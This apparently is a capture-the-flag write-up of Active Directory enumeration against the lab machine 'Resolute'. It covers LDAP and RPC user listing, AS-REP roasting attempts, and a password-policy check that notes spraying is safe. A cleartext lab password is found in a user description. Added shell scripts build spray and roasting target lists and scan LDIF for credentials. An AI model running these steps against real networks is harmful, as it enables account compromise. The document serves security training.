Resolute

Nmap scan

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 08:42 EDT
Nmap scan report for 10.10.10.169
Host is up (0.30s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-15 12:50:59Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2023-09-15T12:51:18
|_  start_date: 2023-09-15T12:49:30
|_clock-skew: mean: 2h27m04s, deviation: 4h02m31s, median: 7m03s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2023-09-15T05:51:19-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.59 seconds
                                                                                                              
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb  10.10.10.169  -u "" up ""
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
                                                                                                              
smbclient

└─$ smbclient -L //10.10.10.169                         
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Add the domain to the hosts file

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local

Anonymous LDAP bind works. First pull the naming contexts, then list the sAMAccountName of every person object:

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                                                                                                              
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
DefaultAccount
RESOLUTE$
MS02$
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
                                                                                                              

Save the users to a text file, users.txt (administrator added at the top, since the LDAP query did not return it), and validate them with kerbrute; all of them come back valid.

Next, check for AS-REP roastable accounts. GetNPUsers.py asks the KDC for a TGT without pre-authentication, and the KDC only hands back the (offline-crackable) AS-REP for accounts that have "Do not require Kerberos preauthentication" set. Loop through the list:

# one request per user; a hash comes back only if UF_DONT_REQUIRE_PREAUTH is set
while read -r user; do
    ./GetNPUsers.py megabank.LOCAL/"$user" -no-pass -dc-ip 10.10.10.169
done < /home/kali/HTB/resolute/users.txt

No account has UF_DONT_REQUIRE_PREAUTH set, so there is nothing to roast. Guest and DefaultAccount answer KDC_ERR_CLIENT_REVOKED instead, which is what a disabled account returns:
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for Guest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for DefaultAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for RESOLUTE$
[-] User RESOLUTE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for MS02$
[-] User MS02$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for ryan
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for marko
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for sunita
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for abigail
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for marcus
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for sally
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for fred
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for angela
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for felicia
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for gustavo
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for ulf
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for stevie
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for claire
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for paulo
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for steve
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for annette
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for annika
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for per
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for claude
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for melanie
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for zach
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for simon
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for naoki
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set

Tried rpcclient with an empty username. Without -N it prompts for a password and the logon fails:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient 10.10.10.169 -U ''
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
                                                                                                                             

Also ran GetNPUsers.py against the domain alone, letting it pull the user list over LDAP itself; no roastable accounts:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.169 -request 'megabank.local/'
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
                                                                                                                             

enum4linux

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ enum4linux -S 10.10.10.169
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Sep 15 09:12:26 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.10.169 )============================


[E] Can't find workgroup/domain



 ===================================( Session Check on 10.10.10.169 )===================================


[+] Server 10.10.10.169 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.10.169 )================================

Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436

[+] Host is part of a domain (not a workgroup)


 =================================( Share Enumeration on 10.10.10.169 )=================================

do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.10.169

enum4linux complete on Fri Sep 15 09:12:46 2023

Tried the null session again with crackmapexec, this time with -p '' (the earlier run had "up" where -p belongs). The null session is accepted, but smbclient still lists no shares, even when forced to SMB2:

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.169 -u '' -p ''

SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\: 
                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U%


        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                             
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U% --max-protocol=SMB2

Tried RID cycling from the domain SID "S-1-5-21-1392959593-3013219662-3596683436" with ridenum.py; the lsaquery works anonymously but the SAMR lookups are refused:

└─$ ./ridenum.py 10.10.10.169 500 550

[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information: 
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[*] Moving on to extract via RID cycling attack.. 
[*] Enumerating user accounts.. This could take a little while.
[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.
[*] Attempting enumdomusers to enumerate users...
[!] Sorry. RIDENUM failed to successfully enumerate users. Bummers.

Password policy. Note that Account Lockout Threshold is None, so a password spray across the user list cannot lock anyone out:

└─$ crackmapexec smb 10.10.10.169 --pass-pol
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] Dumping password info for domain: MEGABANK
SMB         10.10.10.169    445    RESOLUTE         Minimum password length: 7
SMB         10.10.10.169    445    RESOLUTE         Password history length: 24
SMB         10.10.10.169    445    RESOLUTE         Maximum password age: Not Set
SMB         10.10.10.169    445    RESOLUTE         
SMB         10.10.10.169    445    RESOLUTE         Password Complexity Flags: 000000
SMB         10.10.10.169    445    RESOLUTE             Domain Refuse Password Change: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password Store Cleartext: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password Lockout Admins: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password No Clear Change: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password No Anon Change: 0
SMB         10.10.10.169    445    RESOLUTE             Domain Password Complex: 0
SMB         10.10.10.169    445    RESOLUTE         
SMB         10.10.10.169    445    RESOLUTE         Minimum password age: 1 day 4 minutes 
SMB         10.10.10.169    445    RESOLUTE         Reset Account Lockout Counter: 30 minutes 
SMB         10.10.10.169    445    RESOLUTE         Locked Account Duration: 30 minutes 
SMB         10.10.10.169    445    RESOLUTE         Account Lockout Threshold: None
SMB         10.10.10.169    445    RESOLUTE         Forced Log off Time: Not Set
                                                                                                                             

Look for custom object classes and attributes by counting attribute names across the whole tree (command adapted from my Cascade notes, pointed at this target):

ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr

Found some ipsec* attributes in the count, but filtering for them turns up nothing useful. The pipeline groups attributes per LDIF entry and only prints entries that actually carry an ipsec* value (note that base64 values arrive as "ipsecData:: ..." and are split the same way):

ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=*)' \
  sAMAccountName ipsecID ipsecDataType ipsecData ipsecOwnersReference ipsecName \
  ipsecNFAReference ipsecNegotiationPolicyReference ipsecFilterReference \
| awk -F ': ' '
/^dn:/              { entry = $2 }
/^sAMAccountName:/  { entry = $2 }
/^ipsec[A-Za-z]*:/  { a = $1; sub(/:$/, "", a); attrs = attrs " " a "=" $2 }
/^$/                { if (attrs != "") print entry ":" attrs; entry = ""; attrs = "" }'

Nothing relevant came back.

Tried rpcclient again with -N so it does not prompt for a password: rpcclient -U '' -N 10.10.10.169

┌──(kali㉿kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.169                                          

Enumerating users gives the same list we already have from ldapsearch, plus Administrator and krbtgt, which the anonymous LDAP query did not return:

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclient $>

Run querydispinfo and a password turns up in the description of the marko account (Marko Novak). The acb column is the SAMR account-control bitmask: 0x0010 is a normal account, 0x0200 means the password never expires, and 0x0001 marks a disabled account (Guest, DefaultAccount and krbtgt), which matches the KDC_ERR_CLIENT_REVOKED replies earlier:

rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
rpcclient $>

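The acb column is worth decoding before any spraying. The following is an added example (shell, not part of the original notes) that turns each querydispinfo line into a list of SAMR ACB_* flag names, so disabled accounts can be dropped from a spray list and accounts with DONT_REQUIRE_PREAUTH can be picked out for AS-REP roasting. The sample lines are constructed: five copy the flag values seen on the box, and svc_preauth is an invented account that shows the pre-auth-disabled case.

```shell
#!/bin/sh
# Added example (not from the original notes): decode the acb column that
# querydispinfo prints. The bit names are the SAMR ACB_* account-control flags;
# the ones that matter here: 0x0001 DISABLED, 0x0004 PWNOTREQ, 0x0010 NORMAL,
# 0x0200 PWNOEXP, 0x10000 DONT_REQUIRE_PREAUTH.

acb_decode() {   # $1 = acb value as printed, e.g. 0x00000215
    v=$(( $1 )); out=""
    for pair in 0x0001:DISABLED 0x0002:HOMDIRREQ 0x0004:PWNOTREQ 0x0008:TEMPDUP \
                0x0010:NORMAL 0x0020:MNS 0x0040:DOMTRUST 0x0080:WSTRUST \
                0x0100:SVRTRUST 0x0200:PWNOEXP 0x0400:AUTOLOCK 0x0800:ENC_TXT_PWD_ALLOWED \
                0x1000:SMARTCARD_REQUIRED 0x2000:TRUSTED_FOR_DELEGATION 0x4000:NOT_DELEGATED \
                0x8000:USE_DES_KEY_ONLY 0x10000:DONT_REQUIRE_PREAUTH 0x20000:PW_EXPIRED; do
        bit=${pair%%:*}; name=${pair#*:}
        if [ $(( v & $bit )) -ne 0 ]; then out="$out${out:+|}$name"; fi
    done
    printf '%s\n' "$out"
}

# Constructed sample in querydispinfo's line format. The first five lines copy flag
# values seen on the box; svc_preauth is invented to show a pre-auth-disabled account.
SAMPLE_DISPINFO='index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10ff RID: 0x2800 acb: 0x00010010 Account: svc_preauth Name: (null) Desc: (null)'

# stdin: querydispinfo lines -> "account<TAB>FLAG|FLAG|..."
dispinfo_flags() {
    while IFS= read -r line; do
        acb=${line#* acb: }; acb=${acb%% *}
        acct=${line#* Account: }; acct=${acct%% *}
        printf '%s\t%s\n' "$acct" "$(acb_decode "$acb")"
    done
}

# Spray targets: drop anything with the DISABLED bit (those answer KDC_ERR_CLIENT_REVOKED).
enabled_accounts() { dispinfo_flags | awk -F '\t' '$2 !~ /DISABLED/ { print $1 }'; }

# AS-REP roasting targets: DONT_REQUIRE_PREAUTH set (what GetNPUsers.py looks for).
asrep_candidates() { dispinfo_flags | awk -F '\t' '$2 ~ /DONT_REQUIRE_PREAUTH/ { print $1 }'; }

# Live use: paste the querydispinfo output into a file and pipe it in.
printf '%s\n' "$SAMPLE_DISPINFO" | dispinfo_flags
```

On this box every enabled account decodes to NORMAL or NORMAL|PWNOEXP and nothing carries DONT_REQUIRE_PREAUTH, which is the same answer the GetNPUsers.py loop gave, obtained from one RPC call instead of one Kerberos request per user.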

Confirm the same thing with ldapsearch by pulling sAMAccountName and description for every user object.

Same result: marko's description contains the password Welcome123!

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description

# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description 
#

# Guest, Users, megabank.local
dn: CN=Guest,CN=Users,DC=megabank,DC=local
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

# DefaultAccount, Users, megabank.local
dn: CN=DefaultAccount,CN=Users,DC=megabank,DC=local
description: A user account managed by the system.
sAMAccountName: DefaultAccount

# RESOLUTE, Domain Controllers, megabank.local
dn: CN=RESOLUTE,OU=Domain Controllers,DC=megabank,DC=local
sAMAccountName: RESOLUTE$

# MS02, Computers, megabank.local
dn: CN=MS02,CN=Computers,DC=megabank,DC=local
sAMAccountName: MS02$

# Ryan Bertrand, Contractors, MegaBank Users, megabank.local
dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
sAMAccountName: ryan

# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko

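Descriptions are a classic place for onboarding passwords, and reading the raw LDIF by eye works here only because the value sits on one line in clear text. The following is an added example (shell, not part of the original notes) that parses ldapsearch's LDIF properly: it joins folded continuation lines, base64-decodes "attr:: " values, and prints every account whose description looks like it holds a credential. The embedded LDIF is constructed; the Guest and marko entries mirror the real output, while the svc_example and wrapped entries are invented to exercise the base64 and folding paths. It assumes a coreutils-style base64 -d.

```shell
#!/bin/sh
# Added example (not from the original notes): pull password-looking strings out of
# user description attributes in ldapsearch LDIF output. Handles LDIF line folding
# (continuation lines start with a space) and base64 values ("attr:: ..."), which a
# plain grep on "description:" misses. Assumes a coreutils-style `base64 -d`.

# Constructed sample LDIF; only the Guest and marko entries mirror the real output,
# the svc_example and wrapped entries are invented to exercise base64 and folding.
SAMPLE_LDIF='# extended LDIF
#
dn: CN=Guest,CN=Users,DC=megabank,DC=local
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko

dn: CN=Example Svc,OU=Service,DC=megabank,DC=local
description:: VGVtcCBwYXNzd29yZDogU3VtbWVyMjAyMw==
sAMAccountName: svc_example

dn: CN=Wrapped User,OU=Employees,DC=megabank,DC=local
description: Created by helpdesk; initial pw
 d is Changeme1!
sAMAccountName: wrapped
'

# Join folded LDIF lines, drop comments, keep the blank line that ends each entry.
ldif_unfold() {
    awk '
    function flush() { if (buf != "") print buf; buf = "" }
    /^ /  { buf = buf substr($0, 2); next }
    /^#/  { next }
    /^$/  { flush(); print ""; next }
          { flush(); buf = $0 }
    END   { flush(); print "" }'
}

# Read LDIF on stdin; print "account<TAB>description" for every entry whose
# description looks like it carries a credential.
find_password_descriptions() {
    acct=""; desc=""
    ldif_unfold | while IFS= read -r line; do
        case "$line" in
            "")
                if [ -n "$acct" ] && printf '%s' "$desc" | grep -Eiq 'pass(word)?|pwd|cred'; then
                    printf '%s\t%s\n' "$acct" "$desc"
                fi
                acct=""; desc="" ;;
            "sAMAccountName:: "*) acct=$(printf '%s' "${line#sAMAccountName:: }" | base64 -d) ;;
            "sAMAccountName: "*)  acct=${line#sAMAccountName: } ;;
            "description:: "*)    desc=$(printf '%s' "${line#description:: }" | base64 -d) ;;
            "description: "*)     desc=${line#description: } ;;
        esac
    done
}

# Live use: ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' \
#   -s sub '(objectClass=user)' sAMAccountName description | find_password_descriptions
printf '%s' "$SAMPLE_LDIF" | find_password_descriptions
```

The pattern is deliberately loose (pass, pwd, cred); on a real domain expect some noise from descriptions such as "password reset contact", which is cheaper to skim than a missed hit.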
Try the password as marko over SMB with crackmapexec; it fails with STATUS_LOGON_FAILURE:

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 -u marko  -p 'Welcome123!' --shares

SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169 --shares -u marko -p 'Welcome123!'
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose]
                    {ldap,smb,mssql,rdp,ftp,winrm,ssh} ...
crackmapexec: error: unrecognized arguments: --shares
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169  -u marko -p 'Welcome123!' 
SMB         10.10.10.169    5985   RESOLUTE         [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP        10.10.10.169    5985   RESOLUTE         [*] http://10.10.10.169:5985/wsman
WINRM       10.10.10.169    5985   RESOLUTE         [-] megabank.local\marko:Welcome123!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ rpcclient 10.10.10.169 -U marko                                          
Password for [WORKGROUP\marko]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Found a typo in my hosts file, i.e. localx instead of local; also added resolute.megabank.local.

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.localx

127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.10.175    EGOTISTICAL-BANK.LOCAL
10.10.10.100    active.htb  htb
10.10.10.161    htb.local
10.10.10.192    blackfield.local
10.10.10.182    cascade.local
10.10.11.152    timelapse.htb
10.10.10.169    megabank.local  resolute.megabank.local


Still no luck as marko over SMB, and WinRM rejects the credential too:

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!'  
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
